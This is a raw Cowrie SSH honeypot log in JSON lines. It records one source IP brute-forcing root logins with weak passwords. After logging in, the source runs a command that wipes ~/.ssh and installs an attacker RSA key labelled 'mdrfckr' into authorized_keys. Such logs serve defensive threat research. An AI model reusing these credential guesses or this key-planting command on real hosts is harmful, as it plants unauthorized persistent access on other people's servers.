{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35726,"dst_ip":"1.2.3.4","dst_port":22,"session":"2bfde7349672","protocol":"ssh","message":"New connection: 212.227.235.229:35726 (1.2.3.4:22) [session: 2bfde7349672]","sensor":"my-vps","timestamp":"2025-08-28T15:50:46.381516Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:50:46.382537Z","src_ip":"212.227.235.229","session":"2bfde7349672"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:50:46.606694Z","src_ip":"212.227.235.229","session":"2bfde7349672"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T15:50:47.542343Z","src_ip":"212.227.235.229","session":"2bfde7349672"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:50:48.769969Z","src_ip":"212.227.235.229","session":"2bfde7349672"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36852,"dst_ip":"1.2.3.4","dst_port":22,"session":"2eeeee1c97d0","protocol":"ssh","message":"New connection: 212.227.235.229:36852 (1.2.3.4:22) [session: 2eeeee1c97d0]","sensor":"my-vps","timestamp":"2025-08-28T15:50:49.007005Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:50:49.007998Z","src_ip":"212.227.235.229","session":"2eeeee1c97d0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:50:49.233713Z","src_ip":"212.227.235.229","session":"2eeeee1c97d0"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:50:50.175860Z","src_ip":"212.227.235.229","session":"2eeeee1c97d0"}
{"eventid":"cowrie.session.closed","duration":"6.8","message":"Connection lost after 6.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:50:50.402814Z","src_ip":"212.227.235.229","session":"b9c3b7cb77ea"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:50:50.403797Z","src_ip":"212.227.235.229","session":"2eeeee1c97d0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55070,"dst_ip":"1.2.3.4","dst_port":22,"session":"52a43621a86f","protocol":"ssh","message":"New connection: 212.227.235.229:55070 (1.2.3.4:22) [session: 52a43621a86f]","sensor":"my-vps","timestamp":"2025-08-28T15:51:01.631940Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:51:01.632645Z","src_ip":"212.227.235.229","session":"52a43621a86f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:51:01.948396Z","src_ip":"212.227.235.229","session":"52a43621a86f"}
{"eventid":"cowrie.login.success","username":"root","password":"123456@abc","message":"login attempt [root/123456@abc] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:51:03.256213Z","src_ip":"212.227.235.229","session":"52a43621a86f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:51:03.906843Z","src_ip":"212.227.235.229","session":"52a43621a86f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:51:03.907713Z","src_ip":"212.227.235.229","session":"52a43621a86f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:51:03.908825Z","src_ip":"212.227.235.229","session":"52a43621a86f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:51:04.245125Z","src_ip":"212.227.235.229","session":"52a43621a86f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:51:05.325924Z","src_ip":"212.227.235.229","session":"52a43621a86f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T15:51:05.326634Z","src_ip":"212.227.235.229","session":"52a43621a86f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T15:51:05.643504Z","src_ip":"212.227.235.229","session":"52a43621a86f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:51:05.644650Z","src_ip":"212.227.235.229","session":"52a43621a86f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55076,"dst_ip":"1.2.3.4","dst_port":22,"session":"1bdb9b0c6437","protocol":"ssh","message":"New connection: 212.227.235.229:55076 (1.2.3.4:22) [session: 1bdb9b0c6437]","sensor":"my-vps","timestamp":"2025-08-28T15:51:05.960374Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:51:05.961932Z","src_ip":"212.227.235.229","session":"1bdb9b0c6437"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:51:06.275595Z","src_ip":"212.227.235.229","session":"1bdb9b0c6437"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T15:51:07.574868Z","src_ip":"212.227.235.229","session":"1bdb9b0c6437"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:51:08.892492Z","src_ip":"212.227.235.229","session":"1bdb9b0c6437"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55084,"dst_ip":"1.2.3.4","dst_port":22,"session":"77d69ca33509","protocol":"ssh","message":"New connection: 212.227.235.229:55084 (1.2.3.4:22) [session: 77d69ca33509]","sensor":"my-vps","timestamp":"2025-08-28T15:51:09.198643Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:51:09.199669Z","src_ip":"212.227.235.229","session":"77d69ca33509"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:51:09.505932Z","src_ip":"212.227.235.229","session":"77d69ca33509"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:51:10.773337Z","src_ip":"212.227.235.229","session":"77d69ca33509"}
{"eventid":"cowrie.session.closed","duration":"9.4","message":"Connection lost after 9.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:51:11.081036Z","src_ip":"212.227.235.229","session":"52a43621a86f"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:51:11.082277Z","src_ip":"212.227.235.229","session":"77d69ca33509"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53322,"dst_ip":"1.2.3.4","dst_port":22,"session":"adf357dad6fa","protocol":"ssh","message":"New connection: 212.227.235.229:53322 (1.2.3.4:22) [session: adf357dad6fa]","sensor":"my-vps","timestamp":"2025-08-28T15:51:32.151059Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:51:32.151972Z","src_ip":"212.227.235.229","session":"adf357dad6fa"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:51:32.367138Z","src_ip":"212.227.235.229","session":"adf357dad6fa"}
{"eventid":"cowrie.login.success","username":"root","password":"password1234","message":"login attempt [root/password1234] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:51:33.271488Z","src_ip":"212.227.235.229","session":"adf357dad6fa"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:51:33.723079Z","src_ip":"212.227.235.229","session":"adf357dad6fa"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:51:33.723864Z","src_ip":"212.227.235.229","session":"adf357dad6fa"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:51:33.724771Z","src_ip":"212.227.235.229","session":"adf357dad6fa"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:51:33.941331Z","src_ip":"212.227.235.229","session":"adf357dad6fa"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:51:34.433112Z","src_ip":"212.227.235.229","session":"adf357dad6fa"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T15:51:34.434006Z","src_ip":"212.227.235.229","session":"adf357dad6fa"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T15:51:34.651646Z","src_ip":"212.227.235.229","session":"adf357dad6fa"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:51:34.652630Z","src_ip":"212.227.235.229","session":"adf357dad6fa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53326,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c86bdeb4770","protocol":"ssh","message":"New connection: 212.227.235.229:53326 (1.2.3.4:22) [session: 5c86bdeb4770]","sensor":"my-vps","timestamp":"2025-08-28T15:51:34.847862Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:51:34.848566Z","src_ip":"212.227.235.229","session":"5c86bdeb4770"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:51:35.055028Z","src_ip":"212.227.235.229","session":"5c86bdeb4770"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T15:51:35.923251Z","src_ip":"212.227.235.229","session":"5c86bdeb4770"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:51:37.132952Z","src_ip":"212.227.235.229","session":"5c86bdeb4770"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59628,"dst_ip":"1.2.3.4","dst_port":22,"session":"5031d62afabc","protocol":"ssh","message":"New connection: 212.227.235.229:59628 (1.2.3.4:22) [session: 5031d62afabc]","sensor":"my-vps","timestamp":"2025-08-28T15:51:37.357373Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:51:37.358354Z","src_ip":"212.227.235.229","session":"5031d62afabc"}
